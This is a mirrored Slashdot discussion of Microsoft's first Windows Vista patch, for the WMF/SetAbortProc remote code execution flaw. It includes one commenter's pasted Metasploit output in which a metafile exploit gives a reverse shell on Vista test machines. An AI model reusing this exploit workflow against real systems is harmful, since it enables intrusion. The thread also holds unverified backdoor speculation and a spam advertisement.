Slashdot Mirror
First Windows Vista Security Update Released
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
"poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All set abort proc does is send an abort code to the print job and set a call back method to call when the abort completes.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
Don't people use firewalls anymore?
Firewalls don't help in this case. The flaw allows attackers to execute code of their choice on a system when the victim views a WMF file (on a website, for example).
All those who believe in telekinesis, raise my hand.
That is why this is such a dangerous vulnerablities. Since this is a vulnerability in the graphics engine (metafile playback) it can be exploited through a web page that contains a malicous graphic. That will come right in through port 80 on your firewall.
IIRC, Gibson wasn't saying it was a back door that Microsoft hadn't bothered to fix. He was suggesting that it was a back door that somebody had put there on purpose.
Breakfast served all day!
It's been speculated that the WMF vulnerability was there intentionally for whatever reason, or so GRC reported: http://www.grc.com/SecurityNow.htm#22 . Now if it was a rouge programmer or part of MS's plans for world domination, we don't know, but if it was indeed placed there intentionally, it wasn't a bug. If it's not a bug, then of course it would survive the code auditing several times over. Because of the recent discovery of it by the public, of course, MS had to fix it on all OSes, and the Vista patch was just later than the others because it wasn't as critical.
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Consumers don't want it either. They have even less money to pay for new software and hardware than buisnesses. They rarely upgrade any software until they have to or they get a new computer (unless the upgrade is free).
I still have more fans than freaks. WTF is wrong with you people?
Say what???
- 2005-3257 Date? 2005-10-17
- 2005-2490 (and 2492, both with sendmsg) Date? 2005-09-09
- 2005-1768 Date? 2005-07-11
Just about weekly? I beg to differ. Last local root exploit:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE
The one before:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
How about the one before?
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
Perhaps you'd like to backup your claim?
Dozens? No. Several? Yes. Dozen? About that. How many would M$ products have if as many eyes analyzed it relentlessly? A metric assload. Take the partial 2k source code for an example.
...that Longhorn (now Vista) is completly new design... from scratsh... none of the earlier flaws would be ported to it ? ...or are they full of shit as usual ?
Do I remember wrong ?
Actually, .NET 2.0 runs on everything short of Win95 AFAIK. Vista isn't about .NET 2.0 whatsoever, it's about a bunch of other new technologies:
.NET 2 and that people don't care about that is uninformed at best...
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based onto;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentionned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about
///<sig
Repeat after me: Mac OS X is not a microkernel. Mac OS X is not a microkernel
Mac OS X is derived from a microkernel (Mach) - but it's far from being a microkernel. A microkernel is not supposed to have the whole TCP/IP stack in kernel space. A microkernel is not supposed to implement drivers in kernel space. A microkernel is not supposed to have the filesystem in kernel space. Microkernels were, in fact, invented to get these things out of kernel space and run as userspace, etc. Being a pure microkernel implied a performance penaly they were not willing to pay. By moving all those things to kernel space, Mac OS X broke the whole "idea" behind microkernels and stopped being a microkernel (which is not a bad thing: all the other OSes do the same).
NT was also derived from Mach BTW. I will never understand why Mac zealots spend countless hours saying how crap the NT kernel is when the fact is that they derive from the same idea. And just because they are derived from a microkernel doesn't mean the microkernel is who implements all the funtionality. Mac OS X and NT copy from mach the "design": processes implementing funtionality runing in userspace, the real kernel being a scheduler scheduling those processes, etc. That's the "framework", the real functionality (TCP/IP, drivers, FS, etc) is implemented on top of that. The difference is that NT implemented that funcionality looking at VMS, and Mac OS X/nextstep implemented it by using BSD code from FreeBSD. There're some exceptions i think (mac os x vfs and journaling layer is implemented by Mach i think) but the idea is that. And this is BTW the reason why Linus Torvalds just hates mac os x and NT design: If you're going to do a microkernel, do it, but if you are going to put all the drivers and tcp/ip stack in the kernel, then don't use a microkernel design base because you're using the wrong tool and you're overengineering, just use a monolithic kernel and modularize it as much as you can (or something like that)
win2003 directly uses quite a large percent of windows xp.. and the same with vista. not alot of the old nt 3.1 code is still around, since it was all converted from asm to C for nt4 and then continualy removed/replaced. and then the new driver model in 5.0... nt5.1 directly inherits from nt5 as does nt6
portfolio
They "started over" by going back to the RTM Windows Server 2003 code and porting in features from the previous attempt at longhorn selectively. That is, they reset the development of Vista - they did not write a new operating system from scratch.
Now people are making fun of microsoft for porting this over to vista! Do any of you know what it is. If you are a graphics designer you probably should know what it is. Look it up graphics designers and web designers love vector graphics. This is the file that allows windows to draw vector and bitmap images on pre 2000 systems, though it is still included for backwards compatability.
A metafile is a list of commands that can be played back to draw a graphic. Typically, a metafile is made up of commands to draw objects such as lines, polygons and text and commands to control the style of these objects. NOTE: Some people equate metafiles with vector graphics. In most cases this is fine; but, strictly speaking, a metafile can contain any mix of vector and raster graphics. For example, a metafile could contain just one command to display a bitmap! Unless the distinction is important, we will consider a metafile to be a kind of vector graphic.
The reason it was still included is cause it is technically a file format! Do you rewrite everything in linux? Was php totally rewritten from the ground up from php4 to php5 i don't think so.
Just my take on things!
I am giving away 2000 premium accounts on my new dating website myfantasyromance.com check it out!